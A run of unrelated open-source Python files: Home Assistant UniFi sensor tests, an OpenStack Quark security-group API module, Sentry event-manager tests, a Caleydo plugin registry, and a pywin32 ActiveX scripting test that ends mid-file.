    clients_connected = {uptime_client["mac"]}
    devices_connected = set()
    controller = hass.data[UNIFI_DOMAIN][config_entry.entry_id]
    async_dispatcher_send(
        hass,
        controller.signal_update,
        clients_connected,
        devices_connected,
    )
    await hass.async_block_till_done()
    # No duplicate entities are created.
    assert len(hass.states.async_all()) == 2
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 1
async def test_remove_sensors(hass, aioclient_mock, mock_unifi_websocket):
    """Verify removing of clients work as expected."""
    wired_client = {
        "hostname": "Wired client",
        "is_wired": True,
        "mac": "00:00:00:00:00:01",
        "oui": "Producer",
        "wired-rx_bytes": 1234000000,
        "wired-tx_bytes": 5678000000,
        "uptime": 1600094505,
    }
    wireless_client = {
        "is_wired": False,
        "mac": "00:00:00:00:00:02",
        "name": "Wireless client",
        "oui": "Producer",
        "rx_bytes": 2345000000,
        "tx_bytes": 6789000000,
        "uptime": 60,
    }
    await setup_unifi_integration(
        hass,
        aioclient_mock,
        options={
            CONF_ALLOW_BANDWIDTH_SENSORS: True,
            CONF_ALLOW_UPTIME_SENSORS: True,
        },
        clients_response=[wired_client, wireless_client],
    )
    # 3 sensors (rx/tx/uptime) and one tracker entity per client.
    assert len(hass.states.async_all()) == 9
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 6
    assert len(hass.states.async_entity_ids(TRACKER_DOMAIN)) == 2
    assert hass.states.get("sensor.wired_client_rx")
    assert hass.states.get("sensor.wired_client_tx")
    assert hass.states.get("sensor.wired_client_uptime")
    assert hass.states.get("sensor.wireless_client_rx")
    assert hass.states.get("sensor.wireless_client_tx")
    assert hass.states.get("sensor.wireless_client_uptime")
    # Remove wired client
    mock_unifi_websocket(
        data={
            "meta": {"message": MESSAGE_CLIENT_REMOVED},
            "data": [wired_client],
        }
    )
    await hass.async_block_till_done()
    # Only the wired client's entities are gone; the wireless ones remain.
    assert len(hass.states.async_all()) == 5
    assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 3
    assert len(hass.states.async_entity_ids(TRACKER_DOMAIN)) == 1
    assert hass.states.get("sensor.wired_client_rx") is None
    assert hass.states.get("sensor.wired_client_tx") is None
    assert hass.states.get("sensor.wired_client_uptime") is None
    assert hass.states.get("sensor.wireless_client_rx")
    assert hass.states.get("sensor.wireless_client_tx")
    assert hass.states.get("sensor.wireless_client_uptime")
|
|
# Copyright 2013 Rackspace Hosting Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.extensions import securitygroup as sg_ext
from neutron import quota
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from quark.db import api as db_api
from quark.environment import Capabilities
from quark import exceptions as q_exc
from quark import plugin_views as v
from quark import protocols
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# Sentinel UUID for the default security group; it can never be deleted
# (see delete_security_group) or updated (see update_security_group).
DEFAULT_SG_UUID = "00000000-0000-0000-0000-000000000000"
# Maximum lengths enforced by _validate_security_group().
GROUP_NAME_MAX_LENGTH = 255
GROUP_DESCRIPTION_MAX_LENGTH = 255
def _validate_security_group_rule(context, rule):
    """Normalize and validate a security-group-rule dict in place.

    Translates the ethertype and protocol to their internal values and
    validates port ranges; returns the (mutated) rule dict.
    """
    # TODO(mdietz): As per RM8615, Remote groups are not currently supported
    if rule.get("remote_group_id"):
        raise n_exc.InvalidInput(
            error_message="Remote groups are not currently supported")
    direction = rule.get("direction")
    if direction == Capabilities.EGRESS:
        # Egress rules are gated behind an environment capability flag.
        if Capabilities.EGRESS not in CONF.QUARK.environment_capabilities:
            raise q_exc.EgressSecurityGroupRulesNotEnabled()
    # NOTE(review): pop() removes 'protocol' from the dict; when protocol is
    # falsy the key is never put back, so the returned rule lacks it --
    # confirm downstream consumers tolerate a missing 'protocol' key.
    protocol = rule.pop('protocol')
    port_range_min = rule['port_range_min']
    port_range_max = rule['port_range_max']
    ethertype = protocols.translate_ethertype(rule["ethertype"])
    if protocol:
        protocol = protocols.translate_protocol(protocol, rule["ethertype"])
        protocols.validate_protocol_with_port_ranges(ethertype,
                                                     protocol,
                                                     port_range_min,
                                                     port_range_max)
        rule['protocol'] = protocol
    else:
        # Port ranges are meaningless without a protocol.
        if port_range_min is not None or port_range_max is not None:
            raise sg_ext.SecurityGroupProtocolRequiredWithPorts()
    rule["ethertype"] = ethertype
    protocols.validate_remote_ip_prefix(ethertype,
                                        rule.get("remote_ip_prefix"))
    return rule
def _validate_security_group(security_group):
    """Validate the name and description of a security group dict.

    Raises:
        n_exc.InvalidInput: when name/description exceed the configured max.
        sg_ext.SecurityGroupDefaultAlreadyExists: when the name is "default".
    """
    if "name" in security_group:
        if len(security_group["name"]) > GROUP_NAME_MAX_LENGTH:
            # FIX: derive the limit in the message from the constant instead
            # of hardcoding 255, so the two can never drift apart.
            raise n_exc.InvalidInput(
                error_message="Group name must be %d characters or less" %
                              GROUP_NAME_MAX_LENGTH)
        # "default" is reserved for the implicit default group.
        if security_group["name"] == "default":
            raise sg_ext.SecurityGroupDefaultAlreadyExists()
    if ("description" in security_group and
            len(security_group["description"]) > GROUP_DESCRIPTION_MAX_LENGTH):
        raise n_exc.InvalidInput(
            error_message="Group description must be %d characters or less" %
                          GROUP_DESCRIPTION_MAX_LENGTH)
def create_security_group(context, security_group):
    """Create a security group for the calling tenant.

    :param context: request context supplying tenant id and DB session
    :param security_group: {"security_group": {...}} request body
    :returns: the created group as a plain dict
    """
    # Lazy %-args: the string is only formatted when INFO logging is enabled.
    LOG.info("create_security_group for tenant %s", context.tenant_id)
    group = security_group["security_group"]
    _validate_security_group(group)
    group_name = group.get('name', '')
    group_id = uuidutils.generate_uuid()
    with context.session.begin():
        group["id"] = group_id
        group["name"] = group_name
        group["tenant_id"] = context.tenant_id
        dbgroup = db_api.security_group_create(context, **group)
    return v._make_security_group_dict(dbgroup)
def create_security_group_rule(context, security_group_rule):
    """Create a rule on an existing security group.

    Enforces the per-group rule quota and raises SecurityGroupNotFound
    when the target group does not exist.
    """
    # FIX: the log message previously named "create_security_group";
    # also use lazy %-args instead of eager % formatting.
    LOG.info("create_security_group_rule for tenant %s", context.tenant_id)
    with context.session.begin():
        rule = _validate_security_group_rule(
            context, security_group_rule["security_group_rule"])
        rule["id"] = uuidutils.generate_uuid()
        group_id = rule["security_group_id"]
        group = db_api.security_group_find(context, id=group_id,
                                           scope=db_api.ONE)
        if not group:
            raise sg_ext.SecurityGroupNotFound(id=group_id)
        # Count existing rules plus the one being added against the quota.
        quota.QUOTAS.limit_check(
            context, context.tenant_id,
            security_rules_per_group=len(group.get("rules", [])) + 1)
        new_rule = db_api.security_group_rule_create(context, **rule)
    return v._make_security_group_rule_dict(new_rule)
def delete_security_group(context, id):
    """Delete a security group by id.

    Refuses to delete the default group or any group still attached to
    ports.
    """
    # Lazy %-args: formatted only when INFO logging is enabled.
    LOG.info("delete_security_group %s for tenant %s", id, context.tenant_id)
    with context.session.begin():
        group = db_api.security_group_find(context, id=id, scope=db_api.ONE)
        # TODO(anyone): name and ports are lazy-loaded. Could be good op later
        if not group:
            raise sg_ext.SecurityGroupNotFound(id=id)
        if id == DEFAULT_SG_UUID or group.name == "default":
            raise sg_ext.SecurityGroupCannotRemoveDefault()
        if group.ports:
            raise sg_ext.SecurityGroupInUse(id=id)
        db_api.security_group_delete(context, group)
def delete_security_group_rule(context, id):
    """Delete a security group rule by id."""
    # FIX: the log message previously named "delete_security_group";
    # also use lazy %-args instead of eager % formatting.
    LOG.info("delete_security_group_rule %s for tenant %s",
             id, context.tenant_id)
    with context.session.begin():
        rule = db_api.security_group_rule_find(context, id=id,
                                               scope=db_api.ONE)
        if not rule:
            raise sg_ext.SecurityGroupRuleNotFound(id=id)
        group = db_api.security_group_find(context, id=rule["group_id"],
                                           scope=db_api.ONE)
        if not group:
            # FIX: report the missing *group* id -- the old code raised
            # SecurityGroupNotFound with the rule id, which is misleading.
            raise sg_ext.SecurityGroupNotFound(id=rule["group_id"])
        rule["id"] = id
        db_api.security_group_rule_delete(context, rule)
def get_security_group(context, id, fields=None):
    """Return a single security group as a dict, or raise if missing."""
    # Lazy %-args: formatted only when INFO logging is enabled.
    LOG.info("get_security_group %s for tenant %s", id, context.tenant_id)
    group = db_api.security_group_find(context, id=id, scope=db_api.ONE)
    if not group:
        raise sg_ext.SecurityGroupNotFound(id=id)
    return v._make_security_group_dict(group, fields)
def get_security_group_rule(context, id, fields=None):
    """Return a single security group rule as a dict, or raise if missing."""
    # Lazy %-args: formatted only when INFO logging is enabled.
    LOG.info("get_security_group_rule %s for tenant %s",
             id, context.tenant_id)
    rule = db_api.security_group_rule_find(context, id=id,
                                           scope=db_api.ONE)
    if not rule:
        raise sg_ext.SecurityGroupRuleNotFound(id=id)
    return v._make_security_group_rule_dict(rule, fields)
def get_security_groups(context, filters=None, fields=None,
                        sorts=None, limit=None, marker=None,
                        page_reverse=False):
    """List security groups, optionally constrained by `filters`."""
    # Lazy %-args: formatted only when INFO logging is enabled.
    LOG.info("get_security_groups for tenant %s", context.tenant_id)
    # FIX: `filters` defaults to None, and `**None` raises TypeError --
    # fall back to an empty dict.
    groups = db_api.security_group_find(context, **(filters or {}))
    return [v._make_security_group_dict(group) for group in groups]
def get_security_group_rules(context, filters=None, fields=None,
                             sorts=None, limit=None, marker=None,
                             page_reverse=False):
    """List security group rules, optionally constrained by `filters`."""
    # Lazy %-args: formatted only when INFO logging is enabled.
    LOG.info("get_security_group_rules for tenant %s", context.tenant_id)
    # FIX: `filters` defaults to None, and `**None` raises TypeError --
    # fall back to an empty dict.
    rules = db_api.security_group_rule_find(context, **(filters or {}))
    return [v._make_security_group_rule_dict(rule) for rule in rules]
def update_security_group(context, id, security_group):
    """Update a security group's name/description.

    The default group may not be updated; a missing group raises
    SecurityGroupNotFound.
    """
    if id == DEFAULT_SG_UUID:
        raise sg_ext.SecurityGroupCannotUpdateDefault()
    new_group = security_group["security_group"]
    _validate_security_group(new_group)
    with context.session.begin():
        group = db_api.security_group_find(context, id=id, scope=db_api.ONE)
        if not group:
            # FIX: mirror the not-found handling of every other handler in
            # this module instead of passing None into the update call.
            raise sg_ext.SecurityGroupNotFound(id=id)
        db_group = db_api.security_group_update(context, group, **new_group)
    return v._make_security_group_dict(db_group)
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import datetime
import mock
from django.utils import timezone
from sentry.conf import settings
from sentry.interfaces import Interface
from sentry.models import Event, Group, Project, MessageCountByMinute, ProjectCountByMinute, \
SearchDocument
from sentry.utils.db import has_trending
from tests.base import TestCase
class DummyInterface(Interface):
    # Minimal Interface subclass used as a fixture in the tests below.
    def __init__(self, baz):
        self.baz = baz
class SentryManagerTest(TestCase):
    """Integration-style tests for ``Group.objects.from_kwargs`` ingestion:
    error resilience, tag/filter aggregation and per-minute counters."""
    @mock.patch('sentry.models.SearchDocument.objects.index')
    def test_broken_search_index(self, index):
        # A failing search indexer must not prevent event creation.
        index.side_effect = Exception()
        event = Group.objects.from_kwargs(1, message='foo')
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
    @mock.patch('sentry.signals.regression_signal.send')
    def test_broken_regression_signal(self, send):
        # A failing signal handler must not prevent event creation.
        send.side_effect = Exception()
        event = Group.objects.from_kwargs(1, message='foo')
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
    def test_invalid_project(self):
        # Unknown project id surfaces as Project.DoesNotExist.
        self.assertRaises(Project.DoesNotExist, Group.objects.from_kwargs, 2, message='foo')
    def test_valid_only_message(self):
        # Minimal payload: only a message.
        event = Group.objects.from_kwargs(1, message='foo')
        self.assertEquals(event.group.last_seen, event.datetime)
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
    def test_valid_timestamp_without_tz(self):
        # TODO: this doesnt error, but it will throw a warning. What should we do?
        with self.Settings(USE_TZ=True):
            date = datetime.datetime.utcnow()
            event = Group.objects.from_kwargs(1, message='foo', timestamp=date)
            self.assertEquals(event.message, 'foo')
            self.assertEquals(event.project_id, 1)
            self.assertEquals(event.datetime, date.replace(tzinfo=timezone.utc))
    def test_url_filter(self):
        # URL filter values aggregate per distinct URL with a times_seen count.
        event = Group.objects.from_kwargs(1, message='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 0)
        event = Group.objects.from_kwargs(1, message='foo', **{
            'sentry.interfaces.Http': {
                'url': 'http://example.com',
            }
        })
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
        res = group.messagefiltervalue_set.filter(key='url').get()
        self.assertEquals(res.value, 'http://example.com')
        self.assertEquals(res.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo', **{
            'sentry.interfaces.Http': {
                'url': 'http://example.com',
            }
        })
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
        res = group.messagefiltervalue_set.filter(key='url').get()
        self.assertEquals(res.value, 'http://example.com')
        self.assertEquals(res.times_seen, 2)
        event = Group.objects.from_kwargs(1, message='foo', **{
            'sentry.interfaces.Http': {
                'url': 'http://example.com/2',
            }
        })
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='url').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'http://example.com')
        self.assertEquals(res.times_seen, 2)
        res = results[1]
        self.assertEquals(res.value, 'http://example.com/2')
        self.assertEquals(res.times_seen, 1)
    def test_site_filter(self):
        # Site filter values aggregate per distinct site.
        event = Group.objects.from_kwargs(1, message='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 0)
        event = Group.objects.from_kwargs(1, message='foo', site='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 1)
        res = group.messagefiltervalue_set.filter(key='site').get()
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo', site='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 1)
        res = group.messagefiltervalue_set.filter(key='site').get()
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 2)
        event = Group.objects.from_kwargs(1, message='foo', site='bar')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='site').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 2)
        res = results[1]
        self.assertEquals(res.value, 'bar')
        self.assertEquals(res.times_seen, 1)
    def test_server_name_filter(self):
        # Server-name filter values aggregate per distinct server name.
        event = Group.objects.from_kwargs(1, message='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 0)
        event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
        res = group.messagefiltervalue_set.filter(key='server_name').get()
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
        res = group.messagefiltervalue_set.filter(key='server_name').get()
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 2)
        event = Group.objects.from_kwargs(1, message='foo', server_name='bar')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='server_name').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 2)
        res = results[1]
        self.assertEquals(res.value, 'bar')
        self.assertEquals(res.times_seen, 1)
    @mock.patch('sentry.manager.GroupManager.add_tags')
    def test_tags_as_list(self, add_tags):
        # Tags given as a list of pairs are forwarded plus the implicit logger tag.
        event = Group.objects.from_kwargs(1, message='foo', tags=[('foo', 'bar')])
        group = event.group
        add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root')])
    @mock.patch('sentry.manager.GroupManager.add_tags')
    def test_tags_as_dict(self, add_tags):
        # Tags given as a dict are normalized to pairs plus the implicit logger tag.
        event = Group.objects.from_kwargs(1, message='foo', tags={'foo': 'bar'})
        group = event.group
        add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root')])
    def test_dupe_message_id(self):
        # Re-sending the same event_id must not create a second Event row.
        event = Group.objects.from_kwargs(1, event_id=1, message='foo')
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
        self.assertEquals(Event.objects.count(), 1)
        # ensure that calling it again doesnt raise a db error
        Group.objects.from_kwargs(1, event_id=1, message='foo')
        self.assertEquals(Event.objects.count(), 1)
    def test_does_update_messagecountbyminute(self):
        # Per-minute group counters are created and incremented per event.
        event = Group.objects.from_kwargs(1, message='foo')
        inst = MessageCountByMinute.objects.filter(group=event.group)
        self.assertTrue(inst.exists())
        inst = inst.get()
        self.assertEquals(inst.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo')
        inst = MessageCountByMinute.objects.get(group=event.group)
        self.assertEquals(inst.times_seen, 2)
    def test_does_update_projectcountbyminute(self):
        # Per-minute project counters are created and incremented per event.
        event = Group.objects.from_kwargs(1, message='foo')
        inst = ProjectCountByMinute.objects.filter(project=event.project)
        self.assertTrue(inst.exists())
        inst = inst.get()
        self.assertEquals(inst.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo')
        inst = ProjectCountByMinute.objects.get(project=event.project)
        self.assertEquals(inst.times_seen, 2)
    def test_updates_group(self):
        # Events sharing a checksum fold into one group, updating counters/message.
        Group.objects.from_kwargs(1, message='foo', checksum='a' * 32)
        event = Group.objects.from_kwargs(1, message='foo bar', checksum='a' * 32)
        group = Group.objects.get(pk=event.group_id)
        self.assertEquals(group.times_seen, 2)
        self.assertEquals(group.last_seen.replace(microsecond=0), event.datetime.replace(microsecond=0))
        self.assertEquals(group.message, 'foo bar')
    def test_get_accelerrated(self):
        # NOTE(review): name typo ("accelerrated") kept -- renaming would change
        # the discoverable test name.
        if not has_trending():
            return
        group = Group.objects.from_kwargs(1, message='foo', checksum='a' * 32).group
        group_list = list(Group.objects.get_accelerated(Group.objects.all(), minutes=settings.MINUTE_NORMALIZATION)[0:100])
        self.assertEquals(len(group_list), 1)
        self.assertEquals(group_list[0], group)
    def test_add_tags(self):
        # add_tags creates one MessageFilterValue per (key, value) pair.
        event = Group.objects.from_kwargs(1, message='rrr')
        group = event.group
        Group.objects.add_tags(group, tags=(('foo', 'bar'), ('foo', 'baz'), ('biz', 'boz')))
        self.assertEquals(group.messagefiltervalue_set.filter(key='foo').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='foo').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'bar')
        self.assertEquals(res.times_seen, 1)
        res = results[1]
        self.assertEquals(res.value, 'baz')
        self.assertEquals(res.times_seen, 1)
        self.assertEquals(group.messagefiltervalue_set.filter(key='biz').count(), 1)
        results = list(group.messagefiltervalue_set.filter(key='biz').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'boz')
        self.assertEquals(res.times_seen, 1)
class SearchManagerTest(TestCase):
    """Tests for token-based SearchDocument querying."""
    def test_search(self):
        # Build one indexed document and confirm a token query finds it.
        project = Project.objects.all()[0]
        group = Group.objects.create(project=project, message='foo', checksum='a' * 32)
        doc = SearchDocument.objects.create(
            project=project,
            group=group,
            status=group.status,
            total_events=1,
            date_added=group.first_seen,
            date_changed=group.last_seen,
        )
        doc.token_set.create(
            field='text',
            token='foo',
        )
        results = list(SearchDocument.objects.search(project, query='foo'))
        self.assertEquals(len(results), 1)
        # This uses a raw query set so we have to check the id
        self.assertEquals(results[0].id, doc.id)
|
|
###############################################################################
# Caleydo - Visualization for Molecular Biology - http://caleydo.org
# Copyright (c) The Caleydo Team. All rights reserved.
# Licensed under the new BSD license, available at http://caleydo.org/license
###############################################################################
from builtins import object
import logging
from functools import cmp_to_key
_registry = None  # lazily-created process-wide Registry singleton
def _get_registry():
    """Parse plugin metadata (once) and return the shared Registry."""
    global _registry
    if _registry is None:
        from ._plugin_parser import parse
        metadata = parse()
        from .config import merge_plugin_configs, _c, _initialize
        # check initialization
        if _c is None:
            _initialize()
        merge_plugin_configs(metadata.plugins)
        _registry = Registry(metadata.plugins, metadata.server_extensions, metadata)
    return _registry
class Extension(object):
    """
    the loaded plugin instance

    Wraps a plugin description (``desc``) and its imported module (``impl``)
    and exposes the plugin's factory via ``__call__``/``factory``.
    """
    def __init__(self, desc, impl):
        self.desc = desc      # plugin description object
        self.impl = impl      # imported module implementing the plugin
        self._cache = None    # memoized factory result for singleton plugins

    def __call__(self, *args, **kwargs):
        """
        access and call the factory method of this plugin

        For plugins marked ``singleton`` the first created value is cached
        and returned on subsequent calls.
        """
        if getattr(self.desc, 'singleton', False) and self._cache is not None:
            return self._cache
        m = getattr(self.impl, self.desc.factory)
        # The factory attribute may be a callable factory or a plain value;
        # callable() is the idiomatic form of hasattr(m, '__call__').
        v = m(*args, **kwargs) if callable(m) else m
        self._cache = v
        return v

    def factory(self, *args, **kwargs):
        """Alias for calling the extension directly."""
        return self(*args, **kwargs)
class AExtensionDesc(object):
    """Base description of an extension, populated from a plain dict."""

    def __init__(self, desc):
        # Defaults first, so that any key present in ``desc`` wins below.
        self.type = desc.get('type', 'unknown')
        self.id = desc['id']
        self.name = self.id
        self.factory = 'create'
        self.file = 'main'
        self.version = '1.0'
        self.description = ''
        # copy every raw entry onto the instance
        for key in desc:
            setattr(self, key, desc[key])
class ExtensionDesc(AExtensionDesc):
    """
    plugin description

    Lazily imports the plugin module on ``load`` and wraps it in an
    ``Extension``.
    """

    def __init__(self, desc):
        super(ExtensionDesc, self).__init__(desc)
        self._impl = None
        # convert the js module notation to a python dotted path
        self.module = self.module.replace('/', '.')

    def load(self):
        """Import the plugin module (once) and return its Extension wrapper."""
        if self._impl is not None:
            return self._impl
        import importlib
        _log = logging.getLogger(__name__)
        _log.info('importing %s', self.module)
        mod = importlib.import_module(self.module)
        if hasattr(mod, '_plugin_initialize'):  # init method
            mod._plugin_initialize()
        self._impl = Extension(self, mod)
        return self._impl
class PreLoadedExtensionDesc(AExtensionDesc):
    """Description for an extension whose implementation already exists."""

    def __init__(self, desc, impl):
        super(PreLoadedExtensionDesc, self).__init__(desc)
        # Wrap eagerly -- there is nothing to import later.
        self._wrapper = PreLoadedExtension(impl)

    def load(self):
        """Return the pre-built wrapper (no import needed)."""
        return self._wrapper
class PreLoadedExtension(object):
    """Extension-compatible wrapper around an already-created object."""

    def __init__(self, impl):
        self._impl = impl

    def __call__(self, *args, **kwargs):
        # Arguments are accepted for interface compatibility and ignored.
        return self._impl

    def factory(self, *args, **kwargs):
        # Same contract as Extension.factory: hand back the instance.
        return self._impl
class Registry(object):
    """Registry of all extension descriptions plus lazily-built singleton
    'manager' extensions selected by command match and priority."""
    def __init__(self, plugins, extensions, metadata):
        self.plugins = plugins
        self.metadata = metadata
        # wrap the raw extension dicts; additionally expose this registry
        # itself as a pre-loaded 'manager' extension with id 'registry'
        self._extensions = [ExtensionDesc(p) for p in extensions]
        self._extensions.append(PreLoadedExtensionDesc(dict(type='manager', id='registry'), self))
        self._singletons = None
    @property
    def singletons(self):
        """Map of manager id -> zero-arg loader producing the chosen impl."""
        import collections
        from . import config
        # check initialization
        _log = logging.getLogger(__name__)
        if self._singletons is not None:
            return self._singletons
        def loader(e):
            # defer both module import and factory call until first use
            return lambda: e.load().factory()
        # select singleton impl with lowest priority default 100
        mm = collections.defaultdict(lambda: [])
        for e in self._extensions:
            if e.type == 'manager':
                mm[e.id].append(e)
        if config._c is None:
            config._initialize()
        cc = config.view('phovea_server._runtime')
        current_command = cc.get('command', default='unknown')
        _log.info('read currently executed command from config: %s', current_command)
        def compare(a, b):
            # candidates whose 'command' matches the running command win
            # outright; otherwise the lower numeric priority wins
            a_prio = getattr(a, 'priority', 100)
            a_command = getattr(a, 'command', None)
            b_prio = getattr(b, 'priority', 100)
            b_command = getattr(b, 'command', None)
            # if the command matches the current command this has priority
            if a_command != b_command:
                if a_command == current_command:
                    return -1
                elif b_command == current_command:
                    return 1
            return a_prio - b_prio
        def select(v):
            v = sorted(v, key=cmp_to_key(compare))
            _log.info('creating singleton %s %s', v[0].id, getattr(v[0], 'module', 'server'))
            return loader(v[0])
        self._singletons = {k: select(v) for k, v in mm.items()}
        return self._singletons
    def __len__(self):
        return len(self._extensions)
    def __getitem__(self, item):
        return self._extensions[item]
    def __iter__(self):
        return iter(self._extensions)
    def list(self, plugin_type=None):
        """Filter extensions by type string or predicate; None returns all."""
        if plugin_type is None:
            return self
        if not hasattr(plugin_type, '__call__'): # not a callable
            return [x for x in self if x.type == plugin_type]
        return [x for x in self if plugin_type(x)]
    def lookup(self, singleton_id):
        """Instantiate (or fetch) the singleton registered under the id."""
        if singleton_id in self.singletons:
            return self.singletons[singleton_id]()
        return None
def list(plugin_type=None):
    """List registered extensions (delegates to Registry.list).

    NOTE: intentionally shadows the builtin ``list`` within this module.
    """
    return _get_registry().list(plugin_type)
def lookup(singleton_id):
    """Return the singleton instance registered under ``singleton_id`` (or None)."""
    return _get_registry().lookup(singleton_id)
def plugins():
    """Return the raw plugin list from the parsed metadata."""
    return _get_registry().plugins
def metadata():
    """Return the full parsed plugin metadata object."""
    return _get_registry().metadata
|
|
import sys
import pythoncom
from win32com.axscript.server.error import Exception
from win32com.axscript import axscript
from win32com.axscript.server import axsite
from win32com.server import util, connect
import win32com.server.policy
from win32com.client.dynamic import Dispatch
from win32com.server.exception import COMException
import unittest
import win32com.test.util
# Module-wide flag: script/echo output is printed only when '-v' was passed.
verbose = "-v" in sys.argv
class MySite(axsite.AXSite):
    """AXSite that records the last script error so tests can assert on it.

    NOTE: this file is Python 2 (print statements); kept byte-identical.
    """
    def __init__(self, *args):
        # EXCEPINFO tuple of the most recent script error (None until one occurs).
        self.exception_seen = None
        axsite.AXSite.__init__(self, *args)
    def OnScriptError(self, error):
        # Remember the error, then (only in verbose mode) pretty-print the
        # offending source line with a caret under the error column.
        self.exception_seen = exc = error.GetExceptionInfo()
        context, line, char = error.GetSourcePosition()
        if not verbose:
            return
        print " >Exception:", exc[1]
        try:
            st = error.GetSourceLineText()
        except pythoncom.com_error:
            st = None
        if st is None: st = ""
        text = st + "\n" + (" " * (char-1)) + "^" + "\n" + exc[2]
        for line in text.splitlines():
            print " >" + line
class MyCollection(util.Collection):
    """Collection subclass; _NewEnum delegates straight to the base class."""
    def _NewEnum(self):
        return util.Collection._NewEnum(self)
class Test:
    """COM object exposed to the scripts under the name 'test'.

    NOTE: Python 2 file (print statements); code kept byte-identical.
    """
    _public_methods_ = [ 'echo', 'fail' ]
    _public_attrs_ = ['collection']
    def __init__(self):
        self.verbose = verbose
        # Wrapped collection exercised by the scripts' testcollection().
        self.collection = util.wrap( MyCollection( [1,'Two',3] ))
        self.last = ""        # last string echoed by a script
        self.fail_called = 0  # set when a script reports a failure
        # self._connect_server_ = TestConnectServer(self)
    def echo(self, *args):
        # Record (and in verbose mode print) whatever the script sends.
        self.last = "".join([str(s) for s in args])
        if self.verbose:
            for arg in args:
                print arg,
            print
    def fail(self, *args):
        # Scripts call this to flag an assertion failure.
        print "**** fail() called ***"
        for arg in args:
            print arg,
        print
        self.fail_called = 1
        # self._connect_server_.Broadcast(last)
#### Connections currently wont work, as there is no way for the engine to
#### know what events we support. We need typeinfo support.
# Interface id for the (currently unused) event connection point.
IID_ITestEvents = pythoncom.MakeIID("{8EB72F90-0D44-11d1-9C4B-00AA00125A98}")
class TestConnectServer(connect.ConnectableServer):
    """Connectable COM server that broadcasts notifications to sinks."""
    _connect_interfaces_ = [IID_ITestEvents]
    # The single public method that the client can call on us
    # (ie, as a normal COM server, this exposes just this single method.
    def __init__(self, object):
        self.object = object
    def Broadcast(self,arg):
        # Simply broadcast a notification.
        self._BroadcastNotify(self.NotifyDoneIt, (arg,))
    def NotifyDoneIt(self, interface, arg):
        # Invoke DISPID 1000 on each connected sink, passing ``arg``.
        interface.Invoke(1000, 0, pythoncom.DISPATCH_METHOD, 1, arg)
VBScript = """\
prop = "Property Value"
sub hello(arg1)
test.echo arg1
end sub
sub testcollection
if test.collection.Item(0) <> 1 then
test.fail("Index 0 was wrong")
end if
if test.collection.Item(1) <> "Two" then
test.fail("Index 1 was wrong")
end if
if test.collection.Item(2) <> 3 then
test.fail("Index 2 was wrong")
end if
num = 0
for each item in test.collection
num = num + 1
next
if num <> 3 then
test.fail("Collection didn't have 3 items")
end if
end sub
"""
PyScript = u"""\
# A unicode \xa9omment.
prop = "Property Value"
def hello(arg1):
test.echo(arg1)
def testcollection():
# test.collection[1] = "New one"
got = []
for item in test.collection:
got.append(item)
if got != [1, "Two", 3]:
test.fail("Didn't get the collection")
pass
"""
# XXX - needs py3k work! Throwing a bytes string with an extended char
# doesn't make much sense, but py2x allows it. What it gets upset with
# is a real unicode arg - which is the only thing py3k allows!
PyScript_Exc = u"""\
def hello(arg1):
raise RuntimeError("exc with extended \xa9har")
"""
ErrScript = """\
bad code for everyone!
"""
state_map = {
axscript.SCRIPTSTATE_UNINITIALIZED: "SCRIPTSTATE_UNINITIALIZED",
